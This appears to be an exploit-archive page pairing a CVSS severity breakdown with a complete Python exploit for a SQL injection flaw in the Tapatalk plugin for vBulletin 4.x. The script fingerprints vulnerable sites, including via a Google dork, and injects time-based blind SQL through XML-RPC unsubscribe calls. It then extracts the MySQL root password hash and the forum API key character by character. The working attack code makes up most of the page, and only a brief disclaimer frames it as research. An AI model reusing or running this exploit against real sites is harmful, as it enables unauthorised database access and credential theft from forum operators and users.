The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
None
PR
The attacker is unauthenticated prior to attack, and therefore does not require any access to settings or files of the vulnerable system to carry out an attack.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
S
An exploited vulnerability can affect resources beyond the security scope managed by the security authority that is managing the vulnerable component. This is often referred to as a 'privilege escalation,' where the attacker can use the exploited vulnerability to gain control of resources that were not intended or authorized.
Confidentiality
Low
C
There is some impact on confidentiality, but the attacker either does not gain control of any data, or the information obtained does not have a significant impact on the system or its operations.
Integrity
Low
I
Modification of data is possible, but the attacker does not have control over what can be modified, or the extent of what the attacker can affect is limited. The data modified does not have a direct, serious impact on the system.
Availability
None
A
There is no impact on the availability of the system; the attacker does not have the ability to disrupt access to or use of the system.
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
@author: tintinweb 0x721427D8
'''
import urllib2, urllib
import xmlrpclib,re, urllib2,string,itertools,time
from distutils.version import LooseVersion
class Exploit(object):
def __init__(self, target, debug=0 ):
self.stopwatch_start=time.time()
self.target = target
self.path = target
self.debug=debug
if not self.target.endswith("mobiquo.php"):
self.path = self.detect_tapatalk()
if not self.path:
raise Exception("Could not detect tapatalk or version not supported!")
self.rpc_connect()
self.attack_func = self.attack_2
def detect_tapatalk(self):
# request page, check for tapatalk banner
handlers = [
urllib2.HTTPHandler(debuglevel=self.debug),
urllib2.HTTPSHandler(debuglevel=self.debug),
]
ua = urllib2.build_opener(*handlers)
ua.addheaders = [('User-agent', 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3')]
data = ua.open(self.target).read()
if self.debug:
print data
if not "tapatalkDetect()" in data:
print "[xx] could not detect tapatalk. bye..."
return None
# extract tapatalk version
print "[ i] Taptalk detected ... ",
path = "".join(re.findall(r"^\s*<link href=[\s'\"]?(http://.*?/)smartbanner/appbanner.css", data, re.MULTILINE|re.DOTALL))
path+="mobiquo.php"
print "'%s' ... "%path,
data = urllib.urlopen(path).read()
version = "".join(re.findall(r"Current Tapatalk plugin version:\s*([\d\.a-zA-Z]+)", data))
if LooseVersion(version) <= LooseVersion("5.2.1"):
print "v.%s :) - OK"%version
return path
print "v.%s :( - not vulnerable"%version
return None
def rpc_connect(self):
self.rpc = xmlrpclib.ServerProxy(self.path,verbose=self.debug)
def attack_1(self, sqli, sleep=2):
'''
SELECT subscribethreadid
FROM subscribethread AS subscribethread
LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
WHERE subscribethreadid = <INJECTION>
AND subscribethreadid.userid = 0";
<INJECTION>: 1 UNION ALL <select_like_probe> OR FALSE
'''
query = "-1 union %s and ( select sleep(%s) ) "%(sqli,sleep)
query += "union select subscribethreadid from subscribethread where 1=1 OR 1=1" # fix query for "AND subscribeforum.userid=0"
if self.debug:
print """ SELECT subscribethreadid
FROM subscribethread AS subscribethread
LEFT JOIN user AS user ON (user.userid=subscribethread.userid)
WHERE subscribethreadid = %s
AND subscribethread.userid = 0"""%query
return self.rpc.unsubscribe_topic("s_%s"%query) #no escape, invalid_char="_"
def attack_2(self, sqli, sleep=2):
'''
SELECT subscribeforumid
FROM subscribeforum AS subscribeforum
LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
WHERE subscribeforumid = <INJECTION>
AND subscribeforum.userid = 0";
<INJECTION>: 1 UNION ALL <select_like_probe> OR FALSE
'''
query = "-1 union %s and ( select sleep(%s) ) "%(sqli,sleep)
query += "union select subscribeforumid from subscribeforum where 1=1 OR 1=1" # fix query for "AND subscribeforum.userid=0"
if self.debug:
print """ SELECT subscribeforumid
FROM subscribeforum AS subscribeforum
LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
WHERE subscribeforumid = %s
AND subscribeforum.userid = 0"""%query
return self.rpc.unsubscribe_forum("s_%s"%query) #no escape, invalid_char="_"
def attack_blind(self,sqli,sleep=2):
return self.attack_func(sqli,sleep=sleep)
#return self.attack_func("-1 OR subscribethreadid = ( %s AND (select sleep(4)) ) UNION SELECT 'aaa' FROM subscribethread WHERE subscribethreadid = -1 OR 1 "%sqli)
def attack_blind_guess(self,query, column, charset=string.ascii_letters+string.digits,maxlength=32, sleep=2, case=True):
'''
provide <query> = select -1 from user where user='debian-sys-maint' where <COLUMN> <GUESS>
'''
hit = False
# PHASE 1 - guess entry length
print "[ ] trying to guess length ..."
for guess_length in xrange(maxlength+1):
q = query.replace("<COLUMN>","length(%s)"%column).replace("<GUESS>","= %s"%guess_length)
self.stopwatch()
self.attack_blind(q, sleep)
duration = self.stopwatch()
print ".",
if duration >= sleep-sleep/8:
# HIT! - got length! => guess_length
hit = True
print ""
break
if not hit:
print "[ !!] unable to guess password length, check query!"
return None
print "[ *] LENGTH = %s"%guess_length
# PHASE 2 - guess password up to length
print "[ ] trying to guess value ..."
hits = 0
result = ""
for pos in xrange(guess_length):
# for each char pos in up to guessed length
for attempt in self.bruteforce(charset, 1):
# probe all chars in charset
#attempt = re.escape(attempt)
if attempt == "%%":
attempt= "\%"
#LIKE binary = case sensitive.might be better to do caseinsensitive search + recheck case with binary
q = query.replace("<COLUMN>",column).replace("<GUESS>","LIKE '%s%s%%' "%(result,attempt))
self.stopwatch()
self.attack_blind(q, sleep)
duration = self.stopwatch()
#print result,attempt," ",duration
print ".",
if duration >= sleep-sleep/8:
if case:
# case insensitive hit - recheck case: this is drastically reducing queries needed.
q = query.replace("<COLUMN>",column).replace("<GUESS>","LIKE binary '%s%s%%' "%(result,attempt.lower()))
self.stopwatch()
self.attack_blind(q, sleep)
duration = self.stopwatch()
if duration >= sleep-sleep/8:
attempt = attempt.lower()
else:
attempt = attempt.upper()
# case sensitive - end
# HIT! - got length! => guess_length
hits += 1
print ""
print "[ +] HIT! - %s[%s].."%(result,attempt)
result += attempt
break
if not hits==guess_length:
print "[ !!] unable to guess password length, check query!"
return None
print "[ *] SUCCESS!: query: %s"%(query.replace("<COLUMN>",column).replace("<GUESS>","='%s'"%result))
return result
def bruteforce(self, charset, maxlength):
return (''.join(candidate)
for candidate in itertools.chain.from_iterable(itertools.product(charset, repeat=i)
for i in range(1, maxlength + 1)))
def stopwatch(self):
stop = time.time()
diff = stop - self.stopwatch_start
self.stopwatch_start=stop
return diff
if __name__=="__main__":
#googledork: https://www.google.at/search?q=Tapatalk+Banner+head+start
DEBUG = False
TARGET = "http://TARGET/vbb4/forum.php"
x = Exploit(TARGET,debug=DEBUG)
print "[ ] TAPATALK for vBulletin 4.x - SQLi"
print "[--] Target: %s"%TARGET
if DEBUG: print "[--] DEBUG-Mode!"
print "[ +] Attack - sqli"
query = u"-1 UNION SELECT 1%s"%unichr(0)
if DEBUG:
print u""" SELECT subscribeforumid
FROM subscribeforum AS subscribeforum
LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
WHERE subscribeforumid = %s
AND subscribeforum.userid = 0"""%query
print "[ *] guess mysql user/pass"
print x.attack_blind_guess("select -1 from mysql.user where user='root' and <COLUMN> <GUESS>",
column="password",
charset="*"+string.hexdigits,
maxlength=45) # usually 40 chars + 1 (*)
print "[ *] guess apikey"
print x.attack_blind_guess("select -1 from setting where varname='apikey' and <COLUMN> <GUESS>",
column='value',
charset=string.ascii_letters+string.digits,
maxlength=14,
)
print "-- done --"
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum